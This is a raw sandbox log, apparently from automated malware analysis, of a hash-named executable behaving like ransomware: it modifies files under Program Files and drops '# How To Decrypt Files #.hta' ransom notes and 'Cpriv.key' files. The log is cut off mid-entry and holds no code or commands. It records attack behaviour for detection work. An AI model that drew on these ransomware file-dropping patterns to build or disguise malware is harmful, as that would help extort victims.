de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00807_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsHomePage.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\MSEnv\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\mr.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0315612.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\CALENDAR.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\POWERPNT_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH00601G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00017_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105530.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200279.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0282932.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\BIN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00297_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01797_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR34F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\BlackTieNewsletter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSWORD.OLB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Uninstall Information\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\mux\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107450.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00116_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\is\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\SplashScreen.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00242_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BORDERBB.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_floating.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105410.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR3F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SUMIPNTG\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01236_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Sts.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187819.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152708.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02453_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00391_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLYER11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\fonts\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUECALM\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\RICEPAPR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0234687.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\co\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down_BIDI.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Help\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00122_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Media Renderer\DMR_120.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl-hot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\POSTITS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15034_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Visualizations\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02039_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right_over.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0305493.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR48F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ADDINS\PMAILEXT.ECF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0301050.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_over.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182898.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00454_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IE.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1036\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR28B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182946.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\Contracts\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\bin\plugin2\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107458.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107494.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107746.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\WHOOSH.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\InfoPathOM\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Library\Analysis\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DissolveNoise.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00687_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14532_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107718.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153518.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Bibliography\Style\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssLogo.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1042\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\7-Zip\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107750.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115840.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\NAVBARV.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program 